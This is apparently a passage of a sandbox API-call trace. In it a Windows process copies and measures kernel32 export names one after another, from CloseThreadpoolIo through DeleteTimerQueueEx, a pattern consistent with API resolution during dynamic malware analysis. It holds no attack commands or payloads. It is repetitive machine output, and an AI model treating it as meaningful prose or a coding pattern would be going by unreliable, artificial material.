[0083.173] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.173] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.173] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.173] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.173] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.173] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.173] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.173] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.173] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.173] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.173] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.173] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.173] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.173] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.173] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.173] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.173] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.173] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.173] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.173] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.173] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.173] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.173] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.173] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.174] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.174] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.174] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.174] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.174] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.174] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.174] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.174] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.174] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.174] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.174] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.174] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.174] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.174] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.174] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.174] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.174] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.174] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.174] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.174] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.174] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.174] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.174] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.174] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.174] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.174] lstrlenA (lpString="COPYFILEA") returned 9 [0083.174] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.174] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.174] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.174] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.174] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.174] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.174] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.174] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.174] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.174] lstrlenA (lpString="COPYFILEW") returned 9 [0083.174] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.175] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.175] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.175] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.175] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.175] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.175] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.175] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.175] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.175] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.175] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.175] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.175] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.175] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.175] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.175] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.175] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.175] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.175] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.175] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.175] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.175] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.175] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.175] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.175] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.175] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.175] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.175] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.175] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.175] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.175] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.175] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.175] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.175] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.175] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.176] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.176] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.176] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.176] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.176] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.176] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.176] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.176] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.176] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.176] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.176] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.176] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.176] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.176] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.176] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.176] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.176] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.176] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.176] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.176] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.176] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.176] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.176] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.176] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.176] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.176] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.176] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.176] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.177] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.177] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.177] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.177] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.177] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.177] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.177] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.177] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.177] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.177] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.177] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.177] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.177] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.177] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.177] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.177] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.177] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.177] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.177] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.177] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.177] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.177] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.177] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.177] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.177] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.177] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.177] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.177] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.177] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.177] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.177] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.177] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.177] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.177] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.177] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.177] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.177] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.178] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.178] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.178] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.178] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.178] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.178] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.178] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.178] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.178] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.178] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.178] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.178] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.178] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.178] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.178] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.178] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.178] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.178] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.178] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.178] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.178] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.178] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.178] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.178] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.178] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.178] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.178] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.178] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.178] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.178] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.178] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.178] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.178] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.178] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.178] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.178] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.178] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.179] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.179] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.179] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.179] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.179] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.179] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.179] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.179] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.179] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.179] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.179] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.179] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.179] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.179] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.179] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.179] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.179] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.179] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.179] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.179] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.179] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.179] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.179] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.179] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.179] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.179] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.179] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.179] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.179] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.179] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.179] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.179] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.179] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.179] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.179] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.179] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.179] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.179] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.180] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.180] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.180] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.180] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.180] lstrlenA (lpString="DELETEATOM") returned 10 [0083.180] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.180] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.180] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.180] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.180] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.180] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.180] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.180] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.180] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.180] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.180] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.180] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.180] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.180] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.180] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.180] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.180] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.180] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.180] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.180] 